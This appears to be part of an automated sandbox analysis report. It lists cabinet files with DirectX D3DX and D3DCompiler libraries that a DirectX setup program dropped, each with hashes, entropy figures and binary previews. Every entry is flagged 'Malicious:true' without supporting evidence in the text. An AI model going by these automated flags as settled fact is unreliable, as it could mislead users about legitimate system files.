                                                                                              Preview:MSCF....{.......D..............._#..........{....#..............8....).........6P. .d3dx10_35_x86.cat.p....).....6. .d3dcompiler_35.dll.h...2......6. .d3dx10_35.dll.c..........6F. .aug2007_d3dx10_35_x86.inf.I..........6F. .d3dx10_35_x86.inf.i...F......6F. .d3dx10_35_x86_xp.inf.. ......CK.y8............H.<3.1....=...`.&&[...m^...&D.l.%Z.TJ).....%.R..L...z.....{u]..<...y.....qn...e5\..1.1.....L.b.*D".x~....4....@0.....@#XD>D&.].T..........K..,.<(.81A.z.]..A....0.......Y.l......F[.C...R.`...8...$...A....2..8-..F..e.=j.J.ud..dM.I.........!.h..l.+..,....t9..r..!_h.D.. ..,3..hQsQnYE.+V.wL....;.....3#B"...Zh'...........2.Hx.....:2.%......:.&..'... .!.H.%.<..Tj......A3C.W..e....Dpe...]....!....&H.....I..~d...$C }.>.#...}3....X}.F..G!1....r6...WD.....L}.K..t.....)#...6.L.&...........)....9.!p.b....x.....{..f........s.a.U..^..,..3?.............Ck.....!.s.......`.oZk............K[i.g.....E7...f.7f...`.....3...F.....i.?K&.....d.,Yk.L...........,.L...D.Au..].8.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2007_d3dx9_35_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1702192 bytes, 5 files, at 0x44 +A "d3dx9_35_x86.cat" +A "d3dx9_35.dll", flags 0x4, ID 7184, number 1, extra bytes 20 in head, 115 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1711360
                                                                                              Entropy (8bit):7.999186916403002
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:91jqFBu+YTN2MuQ4R6dPnknsGmQA+re+1ZGD+rCbaNHy196aqlF35RJT1q/P0a+8:9FyMTN57+MPO++rB44S1I/F35zhqFR
                                                                                              MD5:3ED592E6CDAE66B1C0671D9EC417A738
                                                                                              SHA1:9F083FFE00A8E5EABF282130CD16044B488B6E0D
                                                                                              SHA-256:4914D2B5C3251B00C0CC236F51AFE469728D92B50C953C66D213F079AC928EAC
                                                                                              SHA-512:0144DD9A83F953EABAAFF3C41F17A363100C9A2CCD932321A4AFE990D8FCB5A430E842DE9146C983409B6366CD974E318A535E6475B10839A6679844CB7D23B7
                                                                                              Malicious:true
                                                                                              Preview:MSCF....0.......D...........................0....#..............s....(.........6P. .d3dx9_35_x86.cat.h.8..(.....6. .d3dx9_35.dll.\.....9....6B. .aug2007_d3dx9_35_x86.inf.....\.9....6B. .d3dx9_35_x86.inf.,...g.9....6B. .d3dx9_35_x86_xp.inf..n_.;..CK.y<.....Y.[.J.f.d.;c..l...."a..2&&[..E.BEY.EZl.%Z.(..%.+%I....3.[}...q..s?..|.w..=.s.s..y..2.S8y..........L.8.....0| .'.. .....LD.'.2'..c.ya.L.a...........C.....C.....^...T..x,.j.X....\.......2a2H.<`.`.c@. BwM(a.#..P....&[R.... $.B.....{....\....5.<$...q.t..qp..c.Z.*.J...DK...d...A@.....:t...^...X.....K...zg>......U.A..#..1v....`'d..d......A.Bf.@y.$a.d.....,.2W.=."t..........".p8.%......C.0....l.F.*.....X.Q......R.....]...c..Y.Y.<t.'...}.........gK....of...........8Gv6......O.....N!d.?...E...g3a....`...G.R2..-@.6@......\..`H$...4...&...g.6..M.........r2K.s.....FM(......}....hCJVC.T.y..@...C...d..Yk.L`....D..L....>d#.08\.h....&...&......ox...4.2......'*K....R...(E.*..@..6RH..A..t.1 ......s........).T..\.G..........w...

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx10_39_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 843207 bytes, 6 files, at 0x44 "d3dx10_39.dll" "D3DCompiler_39.dll", flags 0x4, ID 8952, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):852375
                                                                                              Entropy (8bit):7.998886184584254
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:E6Ih4DqlkwAjhr1mB+uYgrCvCZNmJ9ndKo4XYbX:E664DQkwAj/oNCvCZIdN4ID
                                                                                              MD5:5380053AC4C344BD38604022476B1C1D
                                                                                              SHA1:043DC8F49BCA3BF0BD85E858F5C2EEDF68565C0D
                                                                                              SHA-256:84800C55F773D5D6913E344E41BABA58CF07CEC2E6C7114CA3BF48E8F355419F
                                                                                              SHA-512:F3CE2DEF6E2E8A1D2C07F627E3C437A1BBA0B2E456020A84121346472BE3D28E0FC69623BD408F35A2C639C83DD2787F998DEDFE42B7625DC71500824B035FEC
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................"...............#..............=....$.........8 X..d3dx10_39.dll......$.....8.X..D3DCompiler_39.dll.f(..(......8.2..d3dx10_39_x86.cat.I..........8.2..d3dx10_39_x86.inf.i..........8.2..d3dx10_39_x86_xp.inf.c...@......8.2..Aug2008_d3dx10_39_x86.inf.,"..%,..CK..\.....\./.R3...$...Hef.K0..D<....V..uvA4.J.yTx..YjvY..<.2.133.J.[...O.g.Q.J..gf.....r^.}..s~g..3...F..!...eB>$.e .~..Z.j@V....C]..-..-N.!.Dc.c2.lv..!0b......$&.n.....yH..cz./...|...w.;y../+.......l.|~...?...{..-<Us.(n..M.U...(Bz.I.WCc.q.I..uuu....2O.K}.~_x...P..B.D.P.].C-e..O..x.tJ.....Y....'o5%dE...+..../..".tp...Ap..i^.$.0W.....!...b../.W..y.B.....#.m.k}O.k..z...N........W.3.......S.F..].E..j,.;.xe..I`6p.V..._O..K`.H.C....f.....'..3@?@O..`...@&p..P...W..>HO.....,..CA........0...m.....D....0.....x.S...l.....'....`.....%....{....1y.t...Qp.t..{..A.0c.......k.....@!x......RA/.....@c......}...n.......`.x.L.cA...A ...P..S....2}{%".,....d8..^.K..p.xGE...+..\`:X.>.G.o.Y

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2008_d3dx9_39_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1458712 bytes, 5 files, at 0x44 "d3dx9_39.dll" "d3dx9_39_x86.cat", flags 0x4, ID 7173, number 1, extra bytes 20 in head, 118 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1467880
                                                                                              Entropy (8bit):7.999682997096517
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:ztDuVYfr3zZ3dHi+rHI8lVs1WutNXBoY4RbifcKly/kNwSh1mMbS8X/9Wv8PiL:JDnr3zZ31lVsgENSsfcKaZAFF88+
                                                                                              MD5:4379902C4180A9A6BF40B847372CEC5A
                                                                                              SHA1:C7FC8184D5620154B9BFD6FBC8820A78C4EEE592
                                                                                              SHA-256:61E703E8D231412F135B4ABA629122D9CB69AC9EE39FA3CBBE6B95DE05097A8B
                                                                                              SHA-512:9269F49A5CA90143C50B817E9F5AEC0FC4C32BA1B6D3A21CC5448CAD21A16A902540C8CFC1825B124CE39E0BDC479ADE4354B6BE15B2067E3033E04998E0710A
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....B......D............................B...#..............v.....:........8.X..d3dx9_39.dll.<'....:....8.2..d3dx9_39_x86.cat.....D.:....8.2..d3dx9_39_x86.inf.,...O.:....8.2..d3dx9_39_x86_xp.inf.\...{.:....8.2..Aug2008_d3dx9_39_x86.inf....$:..[.... .1......$Q.f...<....B..we..]w.QR..B.).V..i.k..Z........=......d.. .....2..cLfl..A..w4[..VBs.{...^...S..a..]Z...%vh...9..Ro...K..r.}..ZP......".i..5P..."..............."......I.c.on..F...&..K @T.=...C..a ..!..q...Pb.=........hY.b..i`AY..<xwqvlx,t......Yg..R....g1fG..i..4.o.......S_...V..N.K.N..qQ.....Etr.1...E..*:..|..../e..<...9.s.....%.RT. .M!.$(2b[X.NT.B...HT.?.!.<|4~.?........Si.Xe...l}....J.J|LN...R.o..@W!.y.8..t'....%A.!I..U.A>..~........*..u....2SR.[...9Te.?..U....y*.M.yxnx...z.J..V...(.....X.|...f.h.....?.LGt..UT...o.7.0..h[.P..`...`../$LED..'.E. |.A-.w...6.+.\;.h...H...........8...A...0.n....9- p..M. r.V.!...W...r.Y......BO.d...{4.. ....U..A ).....9f.e............`P..w[.......$..o.L1.~.R.M@\AC....W.%..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2009_D3DCompiler_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 894638 bytes, 5 files, at 0x44 "D3DCompiler_42.dll" "D3DCompiler_42_x86.cat", flags 0x4, ID 10010, number 1, extra bytes 20 in head, 61 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):903806
                                                                                              Entropy (8bit):7.998441664012848
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:kWl8lkb28nNHiYNk9tb59zmj000KFiBudeBsbgy:No8NHi7/pAJioEy
                                                                                              MD5:87BDAE64FD47A75F867A290EC7B8A4B7
                                                                                              SHA1:DD9E69E1815E8BC161E8EB89A0F2A296074BB95D
                                                                                              SHA-256:6BD32337826F5A5141FC06391919A249E984150905C2546DC8BFC33D41A24E82
                                                                                              SHA-512:C8F7A490722741DF4E03823880C6D623FF16AB648A40C1B1C8F7BF26C92499EB34C4596BF239337CD23A57974757958AD9A30D42A4141DC0E7522F998ED3893A
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D................'...............#..............=...X!........$;....D3DCompiler_42.dll.....X!....$;...D3DCompiler_42_x86.cat.!....;....$;...D3DCompiler_42_x86.inf.<....>....$;...D3DCompiler_42_x86_xp.inf.....4A....$;...AUG2009_D3DCompiler_42_x86.inf. ..$..CK.Zyx...?..P....%i..@.mh...,e.Y...5...&.!K).Pe.*........;**..zq.j...* ./..s./dR...=.}.....y.o....93I;.+X.c,.....-Ln..o.)z.<.m..F..e...s.|a....!w@...A=..jj(.T}A.j.j@.j..=...c...=...m.....m...m...6.h.o...[....m.h.k+...s<./F.R.'.<..7Vs...f*.......]..M...O6.NVD....o.{v..*.-.ub..........5..q."....V6..m..B._l..w...mI....j.S...mdlG.c..0.*U.p.. ..?.;"ZS..}?b\|...=.<...q...Wb.s..9..:.VG(......ExM.w.Mp.4.N..g...Vjg..7./\nG....Wyn..l.."..;..6...v....S....b1.Y...^..Sk..P....vRl.x..!.u..)Z(B.u.gQL.(...R0..../)>.x...<..d.3(..h.h.XE...."......}T.....(.S<O.(....(n......|......b&.....E.y....),.m{ml7.7..S.G.....[(.S..XE.L..Hc.L...6.w(vR|C...."......y.........M....o..-.....[.h.b....V4.I9...D.As..]h....).]

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dcsx_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 3313780 bytes, 5 files, at 0x44 "d3dcsx_42.dll" "d3dcsx_42_x86.cat", flags 0x4, ID 7865, number 1, extra bytes 20 in head, 169 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):3322948
                                                                                              Entropy (8bit):7.9992960947448655
                                                                                              Encrypted:true
                                                                                              SSDEEP:98304:hd4ZyuDJf9oMm+hWh3ZHD8VZQCbsY/ny66RHX:BuD8b2WUZQCg+ny/
                                                                                              MD5:73BA11CE0E936726FC9FCB882F8B91EA
                                                                                              SHA1:4A4BABE3AC751E60AE6B5B0D69C93FA53D7FCD21
                                                                                              SHA-256:A9A704B73531D6BF59A421AB5C046C19A16D2B0B07F09816DBE9DA4550A24B17
                                                                                              SHA-512:9A198EB93D5623651D2981A277EAB4C345C08161254D0127D90C97344450AC1A7FD5C8AC840048A43A347E3296B286B646EA0FBA88F0C7BCE1CEED1484112D56
                                                                                              Malicious:true
                                                                                              Preview:MSCF....t.2.....D...........................t.2..#..................`.S.......$;....d3dcsx_42.dll.....`.S...$;...d3dcsx_42_x86.cat.......T...$;...d3dcsx_42_x86.inf.(.....T...$;...d3dcsx_42_x86_xp.inf.c.....T...$;...AUG2009_d3dcsx_42_x86.inf.?b5B.]..CK.w\T..7.Mnb.QA..E..Q .B...AD..X.q.JS.H..&&.....HS... .a.n.((..J/....!R.a.y..g0......<....9.}.^{.....do3.sb........PL....V......_.|)V..w.a.d.>.#~k.......Z.t.......e.o...#.k.,..x.8.(/\.......5.4....?.Z.B;.9;t/....@..^&..C...m.........f.....#N..._e.c(&f....].-|.....>X..?>..S.#&..!..v.BLl1*b.^.&....},..r|4...}Dy...@....\,.^..R....#v....Gl..j%v..w.k...^.....(...........l..m..,............k..J ..?.o.FL.{e........Cj.{..=.-&.oe_?_'8's....~..k.o.}]<}.a.^jnb.....j...........U..3p.....]pl.C..)8.....#V.G..Yp\.#....0.C..q8...#6.G+..p..:...)....#..G8...H.#..z8..x..8._.;Rp......8.....A8hp..#..Sp\.#..Ox....8..0.c3.RpLk.<.x..-8R.#....q..x..~.?}]Jz.bU8L...........j..z.K...6.{Cl..6.sVsV.Z.....sGUrE;..'..a.#>.._Q.U}....sb.\....}-A.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx10_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 186171 bytes, 5 files, at 0x44 "d3dx10_42.dll" "d3dx10_42_x86.cat", flags 0x4, ID 7280, number 1, extra bytes 20 in head, 15 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):195339
                                                                                              Entropy (8bit):7.996178589789764
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:/hxMUzbnbaWbX0JkFvs5aQnkW6sJ/Fw395/lfLxBQLgGlekmQI84HAGujR7j:5CEbiqvs5aQnkW6A/8jlzxBw0/Erd1X
                                                                                              MD5:F264AF5A36B889B4F17EB4D4F9680B4F
                                                                                              SHA1:1DF087EA99D321EC96D0D2F1C66BEE94883D6F08
                                                                                              SHA-256:BB46189EB8CB7769EB7BE00CFBC35902072FA9408313EF53F423E5AE5C728F61
                                                                                              SHA-512:73AE1CF3CAFBA148F4E5B4D8AC12A7AA41F6ECAC86C139C6A7714F90F3DC61C444DC152A3AD3C2CA800C1A1F4955A2B508735F8490666B57D1420FB7A7BFC269
                                                                                              Malicious:true
                                                                                              Preview:MSCF....;.......D...............p...........;....#..................P.........$;....d3dx10_42.dll.....P.....$;...d3dx10_42_x86.cat...........$;...d3dx10_42_x86.inf.(.........$;...d3dx10_42_x86_xp.inf.c.........$;...AUG2009_d3dx10_42_x86.inf.|..f.0..CK..T.I....8*....e0.JVT`..Q......A..a@..i.k..........b.bN......fE.]...y...s._W..~.......9.6.0:../....^.._..F{.3......7.NHL.....T......Z.....Sd.)2W. Y.2Na....^.lk....+......V.J...j.W.vI.Xj.V....Y..^$....&.&....9..azKt..6.*...2..e..).,..6...0,......Z.a...R...k........(..V.E.....2..C....p>r..Y.].sR&....)....i.0.....W..#(.....j.p5.ZvR.!..:.jd..e............7:(..\....kZ..b^...s4W).. L.%......:g......./..5.......eW).....t.2..].... ..X.,.. ~80...v..k.#.1.2.....0..PF.....z.]......\.\.N.E.J`6....p.....@_..;...p.8........x.....y.6.(p.x..XJ..@O........E.v.0p...m4.8.,.6.%...P.lh.. ...B.g..0.....>v.....S.A......E@...0.P..@8....v.9..h....xc*e....'..`..._...........M.lg..P..-.!......L...@$0.........j5..m.{ .H.f.[...C@

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx11_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 99084 bytes, 5 files, at 0x44 "d3dx11_42.dll" "d3dx11_42_x86.cat", flags 0x4, ID 7285, number 1, extra bytes 20 in head, 8 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):108252
                                                                                              Entropy (8bit):7.991332626956763
                                                                                              Encrypted:true
                                                                                              SSDEEP:1536:MI9cI4N24813fwIsfQqzjoroJ1OL79D+0sFGmNjFRchFxLvk5yswFa8D+0qlt6s1:Pah8Vo/1uLJoGmZEFxLvcwM8DZcZxb
                                                                                              MD5:DD47F1E6DC19405F467DD41924267AD0
                                                                                              SHA1:85636EE0C4AF61C44D0B4634D8A25476CF203AE9
                                                                                              SHA-256:39FF69BA9161D376C035D31023D2FDEECB9148A2439ABE3AFD8F608F7E05E09B
                                                                                              SHA-512:F77C4CEF5CB7E927948F75C23A190E73D6C75B4F55915859046533A10AA3C5ABAC77D8BEF71A79368C499C85009213E542094B85B94B69E62AA66B60616777C3
                                                                                              Malicious:true
                                                                                              Preview:MSCF............D...............u................#..................P.........$;....d3dx11_42.dll.....P.....$;...d3dx11_42_x86.cat..........$;...d3dx11_42_x86.inf.(........$;...d3dx11_42_x86_xp.inf.c.........$;...AUG2009_d3dx11_42_x86.inf.ix..@ ..CK.[.X.G.....<..: .QQ.9...S@..A.......p..D._M<.A7&F.q.f]c..xD..Wc.....F7..H..b.._.]=T.tbo.......|O}..[U_.U]o.L......(%..V..Nq.(.....=v........R..3.K.......2c....Zm,..+k.%.....2k.e........s3Xx...C....~..P.X..o..~..[*....../A.?...*\Rl.QRX.g.sz<E....g..s..[/s.(5..T..>/.(.9F&;.c|..).k*....6y.7+P..d...U.J.H7(.x.E.B}.1`..Z. .C....lTP...C7....._^h7F..t....T[.V.r.J.....&?F...Pd.6#..H|....).<.....U...g...5..5..RjE.=.sc:...x1..[..w..p...8*."..Y8.....AV...E".A..p...%d."..5d.!..l4..d}..#.A...#;.l.....!.....Xd...!3"...G...d_"...^do![.l..i.& ..,...d}.9#S.....IA.C......E.6..![...dS..#+@6..@.....m..:......v!{..Zd. [.l&..-.....9..C9...}.x..Y9=.F...k.Z^.^...!{...........R...d.._...~2z_O.mXG.._...XkYEI.....^iA.p.....=...wa;...N.6.2

                                                                                              C:\Windows\SysWOW64\directx\websetup\Aug2009_d3dx9_42_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 722496 bytes, 5 files, at 0x44 "d3dx9_42.dll" "d3dx9_42_x86.cat", flags 0x4, ID 7080, number 1, extra bytes 20 in head, 59 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):731664
                                                                                              Entropy (8bit):7.999475174279291
                                                                                              Encrypted:true
                                                                                              SSDEEP:12288:IDTg2rIyRKFAtmsFp1UChyax+LFl9NiHEpMH5Vfe8PIqEqnyA6F56J2:M02fKYVFvhKLFl9NikiH5V28PXyA6GJ2
                                                                                              MD5:9BC8213933598D050827D20A4573486C
                                                                                              SHA1:E6F9BA62756A00C53746419DEA221881AEB336CF
                                                                                              SHA-256:9C96B6FC4DF5C0EFCA9F0D653976772B2B964243214F99066E4CA4AA6DF791DD
                                                                                              SHA-512:A1920D042963CDDA41DF44044DE5B94B4CEE6EFA102F633214E384918D93D2D6A31EB388BDBD00C7E9C199281E3B71CAA5242E9A42E7F0BE27EDF90A3CF6890C
                                                                                              Malicious:true
                                                                                              Preview:MSCF....@.......D...........................@....#..............;...X.........$;....d3dx9_42.dll.....X.....$;...d3dx9_42_x86.cat...........$;...d3dx9_42_x86.inf.,.........$;...d3dx9_42_x86_xp.inf.\.........$;...AUG2009_d3dx9_42_x86.inf.....::..[.... .......5!.P..wO.n..pOc....7...l.c.n..slmk]....]...B..W..D..UJ...P........C.......l8..y^.S.N.I..7%.....].n...d...>.#....zT{6+..X.UB. A*A......u7{0...n. ....d..R....=...D...F.......n..n..~U.]..U.EX, .......A^;...(...<.@#0/..O.!...i.#.C....D...D.cwC.v.y.<+.*..*..g.l....f.k...W...[..I&...M..W.&Z..^..MB...:.LyQv.l.U.=Y..%....8Ls.......-..".U.....s.f.YVvX...-..8T..m...=..9.CN!89....f.2.G.....:s.G...>.......c^.Z..=h.l..Q..w..yc.\i.Z.^...$cw.T.".d`.jhL;.ZqB.L.{...Z....h{=s.....a.4.1../..`....|;I...;...$.m!l'.g..pa.).b0..:.tT...T..{..<..T.....z.....!....,..|.@.../..A.....q.......@.....................|..5...[..p.6....FE.../.609$.....+.Q.f.N3.....L; ..6./.j.4.a*.E2....(G0,...x..5...IBS.._......9.....%0.....

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2005_d3dx9_28_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1352016 bytes, 5 files, at 0x44 +A "d3dx9_28_x64.cat" +A "d3dx9_28.dll", flags 0x4, ID 6650, number 1, extra bytes 20 in head, 119 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1361184
                                                                                              Entropy (8bit):7.9996739284035945
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:MWKJ8/HOO46naMPT4WtPIDONJkwzpow5Xl6tgvmKSGfEov6tTc1RImGLtqrtYEm:Mj+146nP3PIabkUl6tg+KSG8o2TcRG8E
                                                                                              MD5:D964ED45FF274DA2C8F48E2CBD00AA9F
                                                                                              SHA1:5C2E5607065238FB24A0B65DDFC904406615E2A9
                                                                                              SHA-256:DAF10A54089755F9A8ACEFF0C7695F1AA42D35E3179DA5B9BB91E409036AE547
                                                                                              SHA-512:A74E2DD4BFB037E5F5A1DEAA86F9C4A354F023B62E1F2075509FB707EEE1725B1136441D1059BD3929AF1A44F6372DABEF9CD15D386A77B2B22A532B74CF16AA
                                                                                              Malicious:true
                                                                                              Preview:MSCF....P.......D...........................P....#..............w..............3g. .d3dx9_28_x64.cat..6:........35. .d3dx9_28.dll......U:....3. .infinst.exe......\;....39. .d3dx9_28_x64.inf.&...2_;....39. .dec2005_d3dx9_28_x64.inf...;..9..[.... &.m......R.P...?..R...A...8..(...J....H".VB....2.R.H..M.R.)U*.Rm .3.E#.....`.;..>.c..}.H...Nv .%@.mg..c....o:Ll...9...s...H..i\.e.t!..`....R.?.......@......F..o.......H0....vd.I1.x@.b..`.go.\..C...... .E.x l..xY.eHeE.."....o..J.....=...T..`....0o.(..%.Y&v...S...&.....h...HZ.2J.S^f1Xn.+.....WR....$B...H.......G...?y%.$....%?.A.%a...G]..F.sA./.-.R.7.f]@ ....t...D...9.....././....M/..A.yJ..\Io~I...G.......<Gt...7.!.g.".....t.r.w...f....N.6"4.>..A!.M.]u.~.G.^S..\/a../Y.=..u.U....d.i~.K7..<...e.b..G...~].....=isb?.fa6.._..p...X....P6<.k..[...l.`.........~/....D[c...'.]B..zE5...s..N].x..J.....h.&.,. p..an..I..w...y.....z".>.3_0.9. .....Z.U..3.=.......J.yHE.IU./!....._......O..`..%.0.X..5.jd.../bf..=(.**.....n.....Q.*..

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2005_d3dx9_28_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 1073496 bytes, 5 files, at 0x44 +A "d3dx9_28_x86.cat" +A "d3dx9_28.dll", flags 0x4, ID 6914, number 1, extra bytes 20 in head, 72 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):1082664
                                                                                              Entropy (8bit):7.999121865147412
                                                                                              Encrypted:true
                                                                                              SSDEEP:24576:Wa0lNxqf7fg42FhNffA/Lj41q7+YeSFfSKidHVmTJwagz8u:WHXx652fNffm0oleSt3Fwa3u
                                                                                              MD5:B1CCAAFF46FE022439F7DE5EB9EC226F
                                                                                              SHA1:8BB7225DF13E6B449D318E2649AEB45A5F24DAF7
                                                                                              SHA-256:645F8D90B07C69330A8C7C8912D70538411C9A6B2813048DA8AD3C3119487F93
                                                                                              SHA-512:2B59C07584D45705273A975A0223E4443DB190675558AB89D92E1572DE4843BE3D0D1267818B19185E4E438A8BCFA2AF5FB5EF2A119DA270BE4540576FD78C77
                                                                                              Malicious:true
                                                                                              Preview:MSCF....Xa......D...........................Xa...#..............H..............3g. .d3dx9_28_x86.cat..t#........3). .d3dx9_28.dll......#....38. .d3dx9_28_w9x.inf.....x.#....38. .d3dx9_28_x86.inf.......#....38. .dec2005_d3dx9_28_x86.inf...a.>..CK..X.[...C.)...1X..S.I...(M@A.......Pm..;......,.`...=.#v.$("..w.{...yN<?..=k.^..=s...o.jw..et.=..YA..=H.eF..l...,;.17kj....+.jw..Y.ry6..\.Y.4.igecJ...,.g.yp.F.yc.....X...e...L6.....SI..j......."6."...2.... ..+..O$B,..6l. ..B1l.`.....A..rN2..ggf..g..... ..H..Dp$.1..h..X.O..Pi...[LC.L..!d.\....fff................lknfYP@_..|...Q4.!.JBJ..0...Ri[4.=..r<...b.3M/F].._S.J.."......"...P%@...`..l..J.*/.!.3.M.....y.l...TI.d*~8.0fwf.J)M.C.U....<n7......./..&..P.R0...Q.JU..2.`...2.ri....vp:.Lg.:(.....7.H2.p.!....N.).A...bg......$..6.M5Nj.e.U..-9..P..L.5...G5.......A.P.6..6..v.i..6..6........-....`.........&3nN..K.&w.g-c....4K.9..}...U}.."VCf}*b]..B..+.j.D..d5`..k...j...4UR..... ..Ux."].d5g6..l.70&.%J.^...Q.U.5...9..~

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x64.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 206847 bytes, 5 files, at 0x44 +A "d3dx10_00_x64.cat" +A "d3dx10.dll", flags 0x4, ID 6580, number 1, extra bytes 20 in head, 17 datablocks, 0x1503 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):216015
                                                                                              Entropy (8bit):7.996946294916653
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:SGo145qtWQt9fL4bBHlKqDfaqaGm3+vqm9/Xx0b6POnzED/RIxeqTk0T:SGo145qtbt1LaeB36/xc6PkV
                                                                                              MD5:681407075E9B19E5EF2218832F6FAD71
                                                                                              SHA1:E4F4D292A36CD9A3034007EF9D2005694307EB52
                                                                                              SHA-256:F9BD5BB083BD55D1D2A690BC66D6D9DA0B1A8B49F09E811E788C030669121118
                                                                                              SHA-512:E983E7DD3F40510816FF3AE836600A186DBA827B484B0C346C20E43E229189A86D4CB5CF219C1FC35B77AB0668866446F6E9206B279931C927D4ED66AD3625F1
                                                                                              Malicious:true
                                                                                              Preview:MSCF.....'......D............................'...#.............................5#a .d3dx10_00_x64.cat..)........}5.h .d3dx10.dll......H.....5T_ .infinst.exe......O.....5.` .d3dx10_00_x64.inf......Q.....5.` .dec2006_d3dx10_00_x64.inf......:..[.... .Vm.....%A.P...?..,..".._.R.&.F.J.J.K.^.^.*..".U.!. ...BvJ...G......(.........C~.b...V...i.Z..O.<.%. .*C...@l....a........XBq..Q.]g..2;..+d.[T[.Q..(ji..*J...........T%.E.5.o3w.;.x.p.+@...JH...JA%*.`.F..^....z..B......D.....*S. \.3....."A%'n..h.f%.E.Ue.T..61....i.....m.X.......Wu...pf.a...............G.B...........$..%....R...`K.x....U,/...aH........S..^..2....h.E.6....B.K.A..........4!@7..........2...].}...".2..Z...!V.......-.6..<...{}......*........o.~.ST.}.O.H.,....U.N.;..g{j.~a...^..7.n#.......SJ....~3}I9.\s.o....u.c;.../...RT....O~.R......L>C....W...K....P..z..........f%........::...vr.hC.Z.5...75+^...........evQ...8....v..)...W{..O/..<$....t...;. t..,&F.]&@.R..3e._.KZ.....C|../...^.p&..`\SVd.......ge..E.

                                                                                              C:\Windows\SysWOW64\directx\websetup\Dec2006_d3dx10_00_x86.cab

                                                                                              Download File
                                                                                              Process:C:\Users\user\AppData\Local\Temp\IXP000.TMP\dxwsetup.exe
                                                                                              File Type:Microsoft Cabinet archive data, many, 185760 bytes, 4 files, at 0x44 +A "d3dx10_00_x86.cat" +A "d3dx10.dll", flags 0x4, ID 5461, number 1, extra bytes 20 in head, 14 datablocks, 0x1 compression
                                                                                              Category:dropped
                                                                                              Size (bytes):194952
                                                                                              Entropy (8bit):7.9966042762544145
                                                                                              Encrypted:true
                                                                                              SSDEEP:3072:x4mJ4SadBGg8IZrdosr2nqOwY7l43gRDlcGgp6VMslgVwxikcBmEi21wx8MqX+dN:xJJ4VWgzZptAqOf6wRD5g0VlgVwxL21I
                                                                                              MD5:75C33157D8A1B123D01B2EAC91573C98
                                                                                              SHA1:E3E65896CE0520413979C0143C3AA9BD3A6A27D3
                                                                                              SHA-256:02DAA8B5AC3752F76C3BFD9A505EBF22B1B4B41E44EB92CE2799033B2330D186
                                                                                              SHA-512:F0F1F1DEA5938E1C7FF2ADF7C8D421C2E68E6D3A8CDF18D0F2F3FE1C6837A4F37B367D2D974C35832D1D85A619948DD0F250C7D6DC4AE39F618F5A2893EAC7DD
                                                                                              Malicious:true
